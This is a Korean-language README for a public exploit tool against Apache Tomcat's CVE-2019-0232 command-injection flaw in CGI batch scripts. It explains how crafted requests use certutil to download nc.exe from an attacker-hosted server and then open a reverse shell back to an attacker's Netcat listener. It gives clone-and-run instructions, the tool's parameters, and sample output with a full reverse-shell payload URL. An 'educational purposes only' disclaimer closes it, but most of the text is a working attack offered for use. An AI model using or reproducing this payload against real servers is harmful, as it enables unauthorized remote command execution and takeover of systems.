
안녕하세요, 이것은 CVE-2019-0232를 위한 수정 및 개선된 코드입니다.
이 스크립트는 Apache Tomcat의 CVE-2019-0232 취약점을 악용합니다. 이 취약점은 ism.bat 스크립트의 부적절한 처리로 인해 원격 코드 실행이 가능합니다. 이 스크립트는 certutil 및 nc.exe(Netcat)를 사용한 리버스 쉘 기법을 활용하여 취약한 시스템에 대한 원격 접근을 획득합니다.
ism.bat에 대한 요청 처리 과정에서 발생하는 취약점으로, 공격자가 서버에서 임의의 명령을 실행할 수 있게 합니다. 이 취약점은 사용자 입력에 대한 적절한 검증이 부족하여 발생하며, 공격자는 특수하게 조작된 요청을 통해 임의 명령 실행을 트리거할 수 있습니다.nc.exe 파일을 다운로드하고 이를 사용하여 리버스 쉘을 생성하는 데 악용될 수 있습니다.nc.exe)가 서버에 호스팅되어 있어야 합니다.nc.exe 다운로드: 스크립트는 취약한 Tomcat 서버에 조작된 요청을 보내 certutil을 사용하여 대상 머신에 nc.exe(Netcat) 파일을 다운로드합니다.nc.exe가 다운로드되면, 리버스 쉘 명령을 실행하기 위해 또 다른 요청이 전송되며, 이는 공격자의 Netcat 리스너로 다시 연결됩니다.git clone https://github.com/Dharan10/CVE-2019-0232.git
cd CVE-2019-0232
python3 exploit.py
Target Host: 익스플로잇할 Apache Tomcat 서버의 IP 주소.
Target Port: 대상 서버의 포트 (기본값: 8080).
Server IP: nc.exe를 호스팅하는 서버의 IP 주소.
Server Port: nc.exe가 호스팅된 포트 번호 (기본값: 80).
Netcat Listener IP: 리버스 쉘을 수신할 사용자의 IP 주소.
Netcat Listener Port: 리버스 쉘을 수신 중인 포트.
[*] Sending payload to download nc.exe...
[+] URL1 Response: 200
[*] Sending payload to execute reverse shell...
[+] URL2 Response: 200
[*] Reverse shell payload URL: http://192.168.1.10:8080/cgi/ism.bat?&nc.exe+192.168.1.100+1234+-e+cmd.exe
성공적으로 실행되면 Netcat 리스너로 리버스 쉘 연결이 생성됩니다.
이 스크립트는 교육 목적으로만 제공됩니다. 악의적인 활동에 사용하지 마십시오. 침투 테스트 또는 보안 감사를 수행하기 전에 항상 적절한 권한을 얻으십시오. 이 스크립트의 오용은 법적 결과를 초래할 수 있습니다.
이 익스플로잇을 사용하기 전에 Apache Tomcat 서버가 CVE-2019-0232에 대해 패치되지 않았는지 확인하십시오. 스크립트는 대상 시스템의 구성에 따라 관리자 권한이 필요할 수 있습니다.
작성자: A!Z3N(Dharan) 파워로 제작됨!
이 프로젝트는 MIT 라이선스에 따라 라이선스가 부여됩니다.
그러나 사용에 따른 책임은 본인에게 있습니다. 이 코드는 교육 목적으로만 제공됩니다. 이 코드를 사용함으로써, 귀하는 사용으로 인한 모든 결과에 대해 전적인 책임을 진다는 데 동의합니다. 이 익스플로잇의 오용 또는 무단 사용은 법적 결과를 초래할 수 있습니다. 모든 시스템에 보안 테스트 또는 침투 테스트를 수행하기 전에 항상 적절한 권한을 얻으십시오.
이 코드는 자유롭게 사용, 수정 및 배포할 수 있지만, 윤리적 목적으로만 사용해야 합니다. 작성자는 이 코드로 인해 발생하는 어떠한 손해에 대해서도 책임을 지지 않습니다.
대상 시스템 소유자의 명시적 허가 없이 이 익스플로잇을 사용하지 마십시오.